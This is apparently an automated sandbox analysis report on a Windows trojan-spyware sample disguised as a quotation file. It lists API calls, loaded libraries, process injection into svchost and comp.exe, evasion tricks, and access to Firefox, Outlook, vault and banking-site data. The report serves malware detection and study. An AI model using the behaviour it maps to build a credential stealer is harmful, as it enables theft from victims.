                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E7526013_2_02E75260
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E7346013_2_02E73460
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E6CB2813_2_02E6CB28
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E6CB3013_2_02E6CB30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E8B91013_2_02E8B910
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E6AE8013_2_02E6AE80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E6AE7413_2_02E6AE74
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E6CD5013_2_02E6CD50
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E6AD3013_2_02E6AD30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0349E6EB13_2_0349E6EB
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0349E58313_2_0349E583
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0349E46513_2_0349E465
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0349E91C13_2_0349E91C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0349D9E813_2_0349D9E8
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0349CC8313_2_0349CC83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 102 times
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: String function: 00E28900 appears 42 times
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: String function: 00E20AE3 appears 70 times
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: String function: 00E07DE1 appears 35 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 03765130 appears 56 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 0371B970 appears 275 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 0379EA12 appears 86 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 03777E54 appears 100 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 037AF290 appears 105 times
                Source: QUOTATON-37839993.exe, 00000000.00000003.2177476970.00000000039AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATON-37839993.exe
                Source: QUOTATON-37839993.exe, 00000000.00000003.2177861257.0000000003803000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATON-37839993.exe
                Source: QUOTATON-37839993.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@11/9
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6A06A GetLastError,FormatMessageW,0_2_00E6A06A
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E581CB AdjustTokenPrivileges,CloseHandle,0_2_00E581CB
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00E587E1
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00E6B3FB
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E7EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00E7EE0D
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E783BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00E783BB
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E04E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00E04E89
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeFile created: C:\Users\user\AppData\Local\Temp\aut4700.tmpJump to behavior
                Source: QUOTATON-37839993.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: comp.exe, 0000000D.00000003.2773026171.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4007580490.000000000300F000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2775628464.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4007580490.0000000002FE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: QUOTATON-37839993.exeReversingLabs: Detection: 47%
                Source: QUOTATON-37839993.exeVirustotal: Detection: 30%
                Source: unknownProcess created: C:\Users\user\Desktop\QUOTATON-37839993.exe "C:\Users\user\Desktop\QUOTATON-37839993.exe"
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATON-37839993.exe"
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeProcess created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"
                Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATON-37839993.exe"Jump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeProcess created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: QUOTATON-37839993.exeStatic file information: File size 1226240 > 1048576
                Source: QUOTATON-37839993.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: QUOTATON-37839993.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: QUOTATON-37839993.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: QUOTATON-37839993.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: QUOTATON-37839993.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: QUOTATON-37839993.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: QUOTATON-37839993.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: comp.pdb source: svchost.exe, 00000004.00000002.2589804983.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2555676008.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4007947840.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FOBNeEFwBsF.exe, 0000000C.00000000.2513093798.000000000023E000.00000002.00000001.01000000.00000005.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4007354281.000000000023E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: comp.pdbGCTL source: svchost.exe, 00000004.00000002.2589804983.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2555676008.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4007947840.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: QUOTATON-37839993.exe, 00000000.00000003.2177200855.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, QUOTATON-37839993.exe, 00000000.00000003.2179147356.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2589991575.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2498213915.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2589991575.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2496001332.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009038587.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2592572383.0000000003541000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009038587.000000000388E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2590065626.000000000339D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: QUOTATON-37839993.exe, 00000000.00000003.2177200855.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, QUOTATON-37839993.exe, 00000000.00000003.2179147356.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000002.2589991575.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2498213915.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2589991575.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2496001332.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, comp.exe, comp.exe, 0000000D.00000002.4009038587.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2592572383.0000000003541000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009038587.000000000388E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2590065626.000000000339D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: comp.exe, 0000000D.00000002.4007580490.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009464968.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000000.2660957083.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2882417343.00000000334AC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: comp.exe, 0000000D.00000002.4007580490.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009464968.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000000.2660957083.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2882417343.00000000334AC000.00000004.80000000.00040000.00000000.sdmp
                Source: QUOTATON-37839993.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: QUOTATON-37839993.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: QUOTATON-37839993.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: QUOTATON-37839993.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: QUOTATON-37839993.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E04B37 LoadLibraryA,GetProcAddress,0_2_00E04B37
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E28945 push ecx; ret 0_2_00E28958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02658B23 pushad ; ret 4_2_02658CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0265222A push cs; retf 4_2_0265222F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_026522B0 push ecx; retf 4_2_026522BD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_026522BF pushfd ; iretd 4_2_026522C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02643350 push eax; ret 4_2_02643352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0265183B push edi; iretd 4_2_0265183C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_026580FB pushfd ; retf 4_2_02658116
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02653E7E push ss; retf 4_2_02653E81
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02648600 push ebp; iretd 4_2_02648601
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02658F7A push ecx; iretd 4_2_02658F81
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0264175C pushfd ; ret 4_2_02641778
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02664FC3 push edi; iretd 4_2_02664FCE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02658C08 pushad ; ret 4_2_02658CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02648562 push edi; iretd 4_2_02648563
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02648572 push esi; ret 4_2_02648573
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02641552 pushfd ; ret 4_2_02641566
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02654503 push FFFFFFB7h; iretd 4_2_02654516
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_026565F1 push eax; iretd 4_2_02656603
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_026415BB pushfd ; ret 4_2_02641566
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030309AD push ecx; mov dword ptr [esp], ecx4_2_030309B6
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_0305D3F1 push edi; iretd 12_2_0305D3F2
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_0306713F push ecx; retf 12_2_0306714C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_0306714E pushfd ; iretd 12_2_0306714F
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_030670B9 push cs; retf 12_2_030670BE
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_0306CF8A pushfd ; retf 12_2_0306CFA5
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_0306DE09 push ecx; iretd 12_2_0306DE10
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_03079E52 push edi; iretd 12_2_03079E5D
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_030666CA push edi; iretd 12_2_030666CB
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_0305D401 push esi; ret 12_2_0305D402
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_0306A484 push FF5A8F7Dh; ret 12_2_0306A491
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E048D7
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E85376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00E85376
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E23187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E23187
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeAPI/Special instruction interceptor: Address: 1050AAC
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0307096E rdtsc 4_2_0307096E
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeAPI coverage: 4.7 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\comp.exeAPI coverage: 2.8 %
                Source: C:\Windows\SysWOW64\comp.exe TID: 8004Thread sleep count: 40 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\comp.exe TID: 8004Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe TID: 8032Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe TID: 8032Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\comp.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E6445A
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6C6D1 FindFirstFileW,FindClose,0_2_00E6C6D1
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E6C75C
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E6EF95
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E6F0F2
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E6F3F3
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E637EF
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E63B12
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E6BCBC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E7C420 FindFirstFileW,FindNextFileW,FindClose,13_2_02E7C420
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E049A0
                Source: 2-64-111.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 2-64-111.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
